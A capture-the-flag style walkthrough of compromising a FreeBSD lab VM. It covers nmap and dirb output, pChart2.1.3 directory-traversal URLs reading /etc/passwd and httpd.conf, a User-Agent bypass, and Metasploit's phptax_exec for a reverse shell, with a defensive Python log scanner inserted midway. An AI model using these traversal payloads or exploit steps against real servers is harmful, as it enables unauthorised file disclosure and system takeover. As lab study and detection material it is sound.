Target IP: 192.168.1.159
Kali IP: 192.168.1.128
First, take a look with nmap:
sudo nmap --min-rate 10000 -p- 192.168.1.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 13:50 CST
Nmap scan report for bogon (192.168.1.159)
Host is up (0.00023s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
Now a more detailed scan of those ports:
sudo nmap -A -p22,80,8080 192.168.1.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 13:52 CST
Nmap scan report for bogon (192.168.1.159)
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:FD:5C:9F (VMware)
Device type: firewall|general purpose|VoIP adapter|VoIP phone
Running (JUST GUESSING): Fortinet embedded (89%), OpenBSD 4.X|5.X (88%), Vonage embedded (88%), FreeBSD 10.X (86%), Polycom embedded (86%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/h:vonage:v-portal cpe:/o:freebsd:freebsd:10.3 cpe:/o:openbsd:openbsd:5.9 cpe:/h:polycom:soundpoint_ip_331
Aggressive OS guesses: Fortinet FortiGate-50B or 310B firewall (89%), OpenBSD 4.0 (88%), Vonage V-Portal VoIP adapter (88%), Fortinet FortiGate 100D firewall (86%), Fortinet FortiGate 1500D firewall (86%), FreeBSD 10.3-RELEASE (86%), OpenBSD 5.9 (86%), Polycom SoundPoint IP 331 VoIP phone (86%), Fortinet FortiGate-60B or -100A firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms bogon (192.168.1.159)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.31 seconds
Browsing to the ports: 80 is accessible, 8080 returns a permission error, and the web stack matches the nmap results.
Check for directories:
sudo dirb http://192.168.1.159
+ http://192.168.1.159/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.1.159/index.html (CODE:200|SIZE:152)
The cgi-bin directory also needs permission. Looking at the page source reveals a clue:
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
Searching for pChart2.1.3 shows it has a file inclusion vulnerability; appending the path to the URL works:
http://localhost/pChart2.1.3/examples/index.php/?Action=View&Script=/../../../etc/passwd
Check the Apache server configuration. On where FreeBSD installs it:
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2x/httpd.conf, where x represents the version number. This ASCII text file begins comment lines with a #. The most frequently modified directives are: ServerRoot "/usr/local"
http://localhost/pChart2.1.3/examples/index.php/?Action=View&Script=/../../../usr/local/etc/apache22/httpd.conf
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
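As a defender-side complement to the two traversal requests above (an added example, not part of the original writeup): a small Python scanner over Apache access-log lines that flags query parameters carrying ".." and resolves the file each one would reach from the root. The log lines are constructed samples modelled on the requests in this writeup, not real logs.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample Apache access-log lines (combined format). The first two
# mirror the pChart requests from the writeup; the last two are benign traffic.
SAMPLE_LOG = """\
192.168.1.128 - - [13/Sep/2023:13:55:01 +0800] "GET /pChart2.1.3/examples/index.php/?Action=View&Script=/../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.168.1.128 - - [13/Sep/2023:13:55:09 +0800] "GET /pChart2.1.3/examples/index.php/?Action=View&Script=%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fapache22%2Fhttpd.conf HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.168.1.50 - - [13/Sep/2023:13:56:00 +0800] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.50 - - [13/Sep/2023:13:57:00 +0800] "GET /index.html HTTP/1.1" 200 152 "-" "Mozilla/5.0"
"""

# Just enough of the combined log format: client IP, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def traversal_target(value):
    """Absolute path a '..'-carrying parameter would resolve to, else None."""
    # parse_qs already decoded once; a second unquote catches %252e-style
    # double encoding. Backslashes are treated like slashes.
    decoded = unquote(value).replace("\\", "/")
    if ".." not in decoded.split("/"):
        return None
    # normpath turns "/../../../etc/passwd" into "/etc/passwd", the file the
    # vulnerable include actually opens once the traversal reaches the root.
    return posixpath.normpath("/" + decoded.lstrip("/"))

def find_lfi_attempts(log_text):
    """Return one record per query parameter carrying directory traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, values in parse_qs(parts.query).items():
            for value in values:
                resolved = traversal_target(value)
                if resolved is not None:
                    hits.append({"ip": m.group("ip"), "path": parts.path, "param": name,
                                 "resolved": resolved, "status": int(m.group("status"))})
    return hits

if __name__ == "__main__":
    for h in find_lfi_attempts(SAMPLE_LOG):
        print(f'{h["ip"]} {h["path"]} {h["param"]} -> {h["resolved"]} ({h["status"]})')
```

A 200 status on a flagged line is the signal that the include actually served the file, which is what makes the pChart requests above worth alerting on rather than just logging.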
So port 8080 restricts access by User-Agent (the Allow from env=Mozilla4_browser line). Change it with the Firefox extension User-Agent Switcher and visit:
http://localhost:8080
A new folder shows up; clicking it opens an image. Search for information about it:
http://localhost/phptax/
This can be attacked with msf; a search turns up the module multi/http/phptax_exec.
After configuring it, run it and a reverse connection comes back to the attacking host.